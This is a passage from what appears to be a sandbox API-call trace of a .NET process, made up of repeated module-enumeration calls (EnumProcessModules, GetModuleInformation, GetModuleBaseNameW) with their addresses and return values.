EntryPoint=0x756511d0)) returned 1 [0217.759] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0217.759] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0217.760] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0217.762] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0217.762] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0217.763] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0217.763] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0217.764] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0217.764] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0217.765] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0217.765] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0217.766] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0217.766] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75640000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x75640000, SizeOfImage=0x9000, EntryPoint=0x75641220)) returned 1 [0217.767] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74860000, lpmodinfo=0x18eb48, cb=0xc | out: lpmodinfo=0x18eb48*(lpBaseOfDll=0x74860000, SizeOfImage=0x6a8000, EntryPoint=0x749a7040)) returned 1 [0217.768] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74860000, lpBaseName=0x18e940, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0217.789] GetCurrentProcess () returned 0xffffffff [0217.789] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18ca14, cb=0x1000, lpcbNeeded=0x18dc28 | out: lphModule=0x18ca14, lpcbNeeded=0x18dc28) returned 1 [0217.790] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0217.790] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0217.790] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0217.790] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0217.801] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0217.801] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0217.802] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0217.802] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0217.802] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0217.802] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0217.802] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0217.803] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0217.803] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0217.803] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0217.804] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0217.804] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0217.804] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0217.804] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0217.805] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0217.805] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0217.806] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0217.806] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0217.806] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0217.807] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0217.807] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0217.808] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0217.808] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0217.809] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0217.809] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0217.810] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0217.810] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0217.811] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0217.811] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18dc1c, cb=0xc | out: lpmodinfo=0x18dc1c*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0217.812] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74f10000, lpBaseName=0x18da14, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0217.833] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", lpSrch="\\system.ni.dll") returned 0x0 [0218.002] GetCurrentProcess () returned 0xffffffff [0218.002] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18c02c, cb=0x1000, lpcbNeeded=0x18d240 | out: lphModule=0x18c02c, lpcbNeeded=0x18d240) returned 1 [0218.002] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0218.002] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0218.002] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0218.003] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0218.003] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0218.003] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0218.003] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0218.003] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0218.003] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0218.004] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0218.004] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0218.004] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0218.004] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0218.005] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0218.005] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0218.005] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0218.006] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0218.006] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0218.006] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0218.007] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0218.007] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0218.007] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0218.008] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0218.008] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0218.009] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0218.009] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0218.010] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0218.010] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0218.011] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0218.011] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0218.012] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0218.012] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0218.013] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18d234, cb=0xc | out: lpmodinfo=0x18d234*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0218.013] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74f10000, lpBaseName=0x18d02c, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0218.034] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll", lpSrch="\\system.ni.dll") returned 0x0 [0218.334] GetCurrentProcess () returned 0xffffffff [0218.334] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x188b48, cb=0x1000, lpcbNeeded=0x189d5c | out: lphModule=0x188b48, lpcbNeeded=0x189d5c) returned 1 [0218.335] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0218.335] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0218.335] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0218.335] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0218.335] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0218.335] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0218.335] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0218.335] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0218.336] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0218.336] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0218.336] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0218.337] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0218.337] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0218.337] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0218.337] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0218.338] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0218.338] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0218.338] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0218.339] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0218.339] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0218.339] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0218.340] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0218.340] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0218.341] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0218.341] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0218.342] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0218.342] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0218.342] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0218.343] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x189d50, cb=0xc | out: lpmodinfo=0x189d50*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0218.343] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, 